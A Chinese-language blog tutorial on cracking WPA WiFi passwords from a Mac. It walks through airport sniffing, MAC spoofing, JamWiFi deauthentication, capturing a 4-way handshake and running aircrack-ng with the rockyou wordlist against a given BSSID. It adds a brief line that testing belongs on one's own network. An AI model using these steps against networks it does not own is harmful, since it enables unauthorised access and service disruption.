抱歉,您的浏览器无法访问本站
本页面需要浏览器支持(启用)JavaScript
了解详情 >

实验环境 macOS Catalina 10.15.7

参考链接:https://mba811.gitbooks.io/web-study/content/wlaq/gj/w1.html

参考链接:https://osxdaily.com/2007/01/18/airport-the-little-known-command-line-wireless-utility/

参考链接:https://gwliang.com/2020/01/24/wifi-cracking/#appendix.zh.md

参考链接:https://github.com/0x0XDev/JamWiFi

Kali 实验步骤文档下载链接

链接: https://pan.baidu.com/s/1lsYFPKTl4SY9Ksltl9OShw 提取码: tx86 复制这段内容后打开百度网盘手机App,操作更方便哦

安装

  1. Download and install XCode

    1
    xcode-select --install
  2. Download and install MacPorts

  3. Update Mac Ports

    1
    sudo port -v selfupdate

  4. Install AirCrack

    1
    brew install aircrack-ng
  5. create a symbolic link to the airport command

    1
    cd /usr/sbin
    1
    sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport

aircrack - ng

​ Aircrack-ng是一个包含了多款工具的无线攻击审计套装,其中包含的工具在无线破解过程中都会用到。
​ 在目标AP已有合法客户端连接的情况下,可以通过airodump-ng侦听数据包,然后用aireplay-ng的deauth强制合法客户端掉线,掉线后客户端会尝试重新连接AP,此时会产生握手包。如果成功抓取到该握手包,则可以用字典进行本地离线破解。使用这种方法进行攻击的前提有两个:一是必须处在目标AP的信号范围内;二是已有合法客户端连接该AP。
​ 在客户端开启无线,但是没有与目标AP连接的情况下,可以通过airbase-ng伪造目标AP来欺骗客户端与其连接,这时也会产生握手包,通过这个握手包,同样可以实现破解目标AP无线密码以及入侵客户端。

无线网卡工作模式

  1. 管理模式(Managed)
    Managed模式用于无线STA直接与无线AP进行接入连接。
  2. 主模式(Master)
    Master模式允许无线网卡使用特制的驱动程序和软件工作,作为其他设备的无线AP。例如,无线路由器就是工作在Master模式下。对于普通的PC机来说,如果有合适的硬件也可以变成一台无线AP。
  3. Ad_hoc模式
    当用户的网络由互相直连的设备组成时,就使用Ad_hoc模式。在这个模式中,各设备之间采用对等网络的方式进行连接,无线通信双方共同承担无线AP的职责。
  4. 监听模式(Monitor)
    Monitor模式主要用于监控无线网络内部的流量,用于检测网络和排错。如果要捕获无线数据包,用户的无线网卡和配套的驱动必须支持监听模式。

​ 正常情况下,网卡都工作在管理模式,将要发送的数据包发往连接在一起的所有主机,数据包中包含着应该接收数据包主机的正确地址,只有与数据包中目标地址一致的主机才能接收。

​ 但当处于监听模式时,无论数据包中的目标地址是什么,主机都将接收,而且网络监听不容易被发现。

​ 因为运行网络监听的主机只是在被动的接收局域网中传输的信息,不主动与其他主机交换信息,也没有修改在网络中传输的数据包。

airport Wireless Tool使用

显示基本信息

1
airport -I

扫描周边无线网络

1
airport -s

禁用airport,关闭wifi

1
networksetup -setairportpower airport off

设备名称可以是airport,EN0,EN1等,因Mac硬件和OS X的版本,因此,可能需要指定设备端口,而不是’airport’,例如EN1 EN0或:

1
networksetup -setairportpower en0 off

检查端口(以en0为例子,可以替换成其他的)

1
networksetup -getairportpower en0

启用端口,打开wifi

1
networksetup -setairportpower en0 on

扫描

1
airport en0 scan

可以使用grep进行过滤,如

1
2
airport en0 scan |grep WEP
airport en0 scan |grep WPA

监听

1
sudo airport en0 sniff 6

​ en0是所使用网卡的名称,sniff表示模式,6表示信道

Ctrl c 停止监听

Wireshark分析包

根据Mac地址查看厂商

http://www.atoolbox.net/Tool.php?Id=808

http://www.metools.info/other/o67.html

https://mac.bmcx.com/d0:76:e7:ef:c3:41__mac/

在漏洞网站查看公开的漏洞信息

Routerpwn.com

MAC地址伪装

1
sudo ifconfig en0 lladdr 00:00:00:00:00:00:01 

Deauth攻击

https://github.com/0x0XDev/JamWiFi

Jamwifi下载:

链接: https://pan.baidu.com/s/180kUZjXXf6PS8C8ZtB2d6Q 提取码: fcu4 复制这段内容后打开百度网盘手机App,操作更方便哦

抓包

无线诊断工具

幸运的是,OSX 配备了一套无线诊断工具。 要打开它们,请在按住键盘上 option 键的同时,点击菜单栏中的 Wi-Fi 图标。 然后选择“打开无线诊断…”

测定目标网络信道

打开无线诊断程序,单击窗口 > 扫描。 找到目标网络,记录下其信道和宽度。

wifi-2(9)

wifi-2(10)

抓取一个 4-way handshake

  1. 在无线诊断程序打开的情况下,点击菜单栏中的窗口 > 嗅探器。选择你在上一步中找到的信道和宽度。
  2. 现在,你需要等待有设备连接到目标网络。如果你正在自己的网络上测试(使用者应当只在自己的网络上进行测试),将任意一个无线设备重新连接就可以抓取 handshake。
  3. 当你感觉已经成功抓取 handshake 时,点击停止。
  4. 根据你的操作系统版本,抓取的 .wcap 文件将被保存到桌面或/var/tmp/
  5. 将抓取的文件上传到 https://hashcat.net/cap2hccapx/ 就可以将其转换为 .hccapx 文件。 如果你成功的抓到了 handshake ,站点将开始下载一个.hccapx文件。 否则将不会提示下载。

wifi-2(11)

破解

1
aircrack-ng -w /Users/gryffinbit/Downloads/rockyou.txt /tmp/airportSniffbW3DzV.cap

-w表示使用字典,/Users/gryffinbit/Downloads/rockyou.txt是字典所在的路径,airportSniffbW3DzV.cap是刚才监听生成的文件。执行后会分析这个文件,最后会询问你得目标网络是哪个。

1
aircrack-ng -w dic.txt -M 100 -f 80 -1 -a 2 -b **:**:**:**:**:** /tmp/airportSniffbW3DzV.cap
1
aircrack-ng -w /Users/gryffinbit/Documents/攻击包/naive-hashcat/dicts/rockyou.txt -M 100 -f 80 -1 -a 2 -b 40:B0:76:53:31:F8 /Users/gryffinbit/Desktop/Gryffinbit’s\ MacBook\ Pro_ch11_2021-05-04_10.43.18.435.pcap
  • -w 指定字典文件
    • -M 指定最大IVs,根据提示可以适当调大次参数
    • -f 暴力破解因子,默认2,也可适当调大
    • -a 加密类型,1:WEP, 2:WPA-PSK
    • -b BSSID,刚刚纪录目标Wi-Fi的Mac地址
        - 后面紧跟之前记录的捕获数据的存储地址即可。

 更多参数说明可以通过aircrack-ng --help查看。


后记

kali

​ airmon-ng是Aircrack-ng中的一个工具,主要用来设置监听模式。在破解无线网络时,通常都是用该工具将无线网卡设置为监听模式。语法格式如下:

1
airmon-ng <start|stop> <interface> [channel]
1
airmon-ng <check> [kill]

参数含义:

参数 说明
start 启动监听模式
stop 停止监听模式
interface 指定设置监听模式的接口
channel 指定无线网络的信道
check 列出所有可能干扰无线网卡的程序。
kill 杀死所有可能干扰无线网卡的程序。

评论